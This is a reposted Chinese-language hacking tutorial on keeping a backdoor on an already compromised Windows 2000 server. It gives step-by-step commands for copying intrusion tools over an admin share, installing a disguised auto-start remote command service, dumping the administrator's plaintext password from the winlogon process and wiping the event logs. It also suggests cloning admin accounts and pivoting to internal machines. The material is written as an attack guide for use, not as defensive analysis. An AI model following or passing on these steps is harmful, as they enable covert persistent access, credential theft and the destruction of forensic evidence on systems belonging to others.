轉]Win2k入侵后后門的放置 
    在閱讀本文之前，假設你已經成功入侵了某臺Win2k主機并取得了管理員帳號。大多數時候我們入侵某臺主機的目的并不是為了直接破壞，可以在該主機上留下后門以便自己以后可以方便的“使用”該機。
    目前一般情況下，入侵Win2k后使用最多的后門是RemoteNc了，但該工具有一很大的缺點，容易被殺毒軟件查出，而且如果用fport或Active Ports等軟件也可以看到它監聽的端口，這很容易讓管理員發現。
對于Win2k下的后門推薦使用Win2k Resoruce Kit中自帶的一個小工具
rcmdsvc.exe和rcmd.exe，這是微軟自己出的一個用來在命令行下遠程
管理主機的小工具。它有以下優點：

1、不會被殺毒軟件認為是病毒或后門程序，畢竟這是微軟自己出的東西。
2、非常隱蔽，它開的端口是445，和Win2k系統的Microsoft-DS服務開的
端口一樣，用fport或Active Ports都不能列出它正在監聽的端口。

下面我們來看一次實際的操作

當然進行以下操作之前假設已經具有以下條件：

1、你已經取得了xxx.xxx.xxx.xxx的管理員權限
2、該機啟用了tcp/ip上的Netbios支持
3、在IP安全策略中對139和445端口未進行屏蔽
4、安全策略中對匿名連接的額外限制采用的是默認的安全選項

/*如果后三條中有某條不能滿足，那么會讓我們的后續操作有些困難，
不過仍然有其它辦法可以繼續，如果大家感興趣我會在以后的文章中說明*/

c:\>net use z: \\xxx.xxx.xxx.xxx "password" /user:"administrator"

c:\>copy rcmdsvc.exe z:\winnt\system32
c:\>copy pulist.exe z:\winnt\system32
c:\>copy findpass.exe z:\winnt\system32
c:\>copy kill.exe z:\winnt\system32
c:\>copy clearel.exe z:\winnt\system32
c:\>copy clealog.cmd z:\winnt\system32
c:\>copy fpipe.exe z:\winnt\system32
c:\>copy msvcp60.dll z:\winnt\system32

/*拷貝一些常用的工具到對方服務器上，在這里對這些工具做一個簡要說明：
rcmdsvc.exe Win2k Resource Kit中的遠程命令行服務器端程序
pulist.exe 可以列出系統進程和該進程所屬用戶的工具
findpass.exe 可以在winlogon.exe進程中查找指定用戶名的名文口令的工具
kill.exe 可以用pdi或進程名殺掉指定進程的工具
clearel.exe 清除系統、應用程序、安全日志的工具
clealog.cmd 同上
fpipe.exe 可以在命令行下做端口重定向的工具
msvcp60.dll vc的運行庫，這個東西其實不是必須的，但為了防止在某些缺少
msvcp60.dll的機上在運行clealog清除日志時對方的機上會突然彈出一個對話
框說缺少msvcp60.dll的尷尬
情況，最好把它一起復制過去。*/

c:\>sc \\xxx.xxx.xxx.xxx create "Remote Command Service" binpath= 
c:\winnt\system32\rcmdsvc.exe type= own start= auto

/*在這里我們用sc在目標機xxx.xxx.xxx.xxx上創建了一個名為Remote Command 
Service的服務，啟動方式為自動。當然為了隱蔽，你最好把“Remote Command 
Service”這個服務名改成其它比較類似系統服務的名字，畢竟管理員不可能
看著一個突然多出來的Remote Command而坐視不管，而且也顯的你太囂張了。*/

/*ps:sc.exe是Win2k Resource Kit中一個功能非常強大的對服務進行控制的工具，
詳細的使用方法可以參考本站的《sc使用完全指南》。*/

c:\>sc \\xxx.xxx.xxx.xxx start "Remote Command Service"

SERVICE_NAME: rpc support services
        TYPE               : 10  WIN32_OWN_PROCESS
        STATE              : 2  START_PENDING
                                (NOT_STOPPABLE,NOT_PAUSABLE,
IGNORES_SHUTDOWN)
        WIN32_EXIT_CODE    : 0  (0x0)
        SERVICE_EXIT_CODE  : 0  (0x0)
        CHECKPOINT         : 0x0
        WAIT_HINT          : 0x7d0

/*在這里我們用sc啟動剛才創建的Remote Command Service服務。*/ 

/*下面連上對方服務器*/

c:\>rcmd

Enter Server Name : xxx.xxx.xxx.xxx
Connect to \\xxx.xxx.xxx.xxx

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

C:\document. and Settings\Default User.WINNT>pulist

Process           PID  User
Idle              0
System            8
smss.exe          168  NT AUTHORITY\SYSTEM
csrss.exe         192  NT AUTHORITY\SYSTEM
winlogon.exe      212  NT AUTHORITY\SYSTEM
services.exe      240  NT AUTHORITY\SYSTEM
lsass.exe         252  NT AUTHORITY\SYSTEM
svchost.exe       408  NT AUTHORITY\SYSTEM
spoolsv.exe       436  NT AUTHORITY\SYSTEM
msdtc.exe         464  NT AUTHORITY\SYSTEM
svchost.exe       596  NT AUTHORITY\SYSTEM
llssrv.exe        624  NT AUTHORITY\SYSTEM
regsvc.exe        676  NT AUTHORITY\SYSTEM
rpcsvc.exe        692  NT AUTHORITY\SYSTEM
mstask.exe        716  NT AUTHORITY\SYSTEM
LSESS.EXE         792  NT AUTHORITY\SYSTEM
tlntsvr.exe       832  NT AUTHORITY\SYSTEM
VrUpSvr.exe       956  NT AUTHORITY\SYSTEM
winmgmt.exe       968  NT AUTHORITY\SYSTEM
dns.exe           980  NT AUTHORITY\SYSTEM
dfssvc.exe        1064 NT AUTHORITY\SYSTEM
POP3S.exe         1100 NT AUTHORITY\SYSTEM
smtpds.exe        1120 NT AUTHORITY\SYSTEM
svchost.exe       1384 NT AUTHORITY\SYSTEM
dllhost.exe       1316 NT AUTHORITY\SYSTEM
internat.exe      1308 SERVER\Administrator
conime.exe        1680 SERVER\Administrator
VRMONSVC.EXE      872  NT AUTHORITY\SYSTEM
inetinfo.exe      1456 NT AUTHORITY\SYSTEM
explorer.exe      1548 SERVER\Administrator
cmd.exe           1712 SERVER\Guest
pulist.exe        532  SERVER\Guest

/*我們可以看到winlogon.exe的進程號是212*/

C:\document. and Settings\Default User.WINNT>findpass server 
administrator 212

To Find Password in the Winlogon process
Usage: fidp DomainName UserName PID-of-WinLogon

The debug privilege has been added to PasswordReminder.
The WinLogon process id is 214 (0x000000d6).
To find server\administrator password in process 214 ...
The encoded password is found at 0x01a00800 and has a length of 3.
The logon information is: server/administrator/Tgrh87fd.
The hash byte is: 0xb8.

/*在winlogon中查找administrator的名文口令*/

C:\document. and Settings\Default User.WINNT>clealog
clealog done

/*清除日志記錄*/

C:\document. and Settings\Default User.WINNT>

到這里我們已經看到administrator的密碼是Tgrh87fd

至此我們拿到了管理員的密碼并安放了一個rcmdsvc的后門，當然你還可以接著做許多事。比如利用Adam發現的Bug再克隆一個管理員賬號。或者用sc把對方的Tlntsvr服務啟起來。不過后者比較容易被發現，不推薦。如果你對他的內網的某臺機感興趣而且該機也有漏洞，可以用fpipe做端口重定向后為下一步的進攻做準備。